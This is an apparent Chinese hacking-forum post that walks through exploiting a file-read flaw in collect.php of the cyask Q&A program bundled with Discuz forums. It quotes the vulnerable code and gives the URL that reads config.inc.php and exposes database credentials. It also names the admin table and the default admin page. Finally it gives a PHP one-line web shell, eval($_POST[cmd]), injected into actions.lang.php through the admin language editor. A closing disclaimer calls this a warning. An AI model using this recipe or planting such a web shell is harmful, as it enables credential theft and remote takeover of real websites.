By:linkboy
昨天在晚上看到了一个这样的文章,却没有人说利用的方法,自己研究了一下,原来这么简单。
下面是这篇文章的内容。
下午帮同事看一个站,DZ的论坛,该补的都补了,咱也没圈day
然后逛了下有个仿百度知道的程序在上面,和DZ整合了,原以为也是Dz开发的,估计也没啥问题
下来看代码,看到collect.php
——————————-
else
{
/*
检查网址
*/
$url=get_referer();
$neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
$collect_url=empty($neturl) ? $url : $neturl;
$contents = ”;
if($fid=@fopen($collect_url,”r“))
{
do
{
$data = fread($fid, 4096);
if (strlen($data) == 0)
{
break;
}
$contents .= $data;
}
while(true);
fclose($fid);
}
else
{
show_message(’collect_url_error’, ”);
exit;
}
———————————-
害人啊,本来还挺安全的一个站,整合个毛呃……
找一个cyask的网站,在其上面注册,然后登录后,输入http://www.×××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键,点查看源文件,哇,什么都看到了,我只是说出来利用方法,希望大家尽早补漏洞。一切损失与本人无关哦!
------------------------------------------------------------------------------------
powered by cyask
漏洞页面:collect.php
注册用户 http://www.xx.com/collect.php?neturl=config.inc.php
管理员表:cdb_members
问题答案 security quesotion
默认后台: http://www.xx.com/ask/admin.php
编辑器编辑actions 对应actions.lang.php
在最下方guest的默认值改为丛林\\');eval($_POST[cmd])?>;//
链接地址http://www.xx.com/bbs/templates/default/actions.lang.php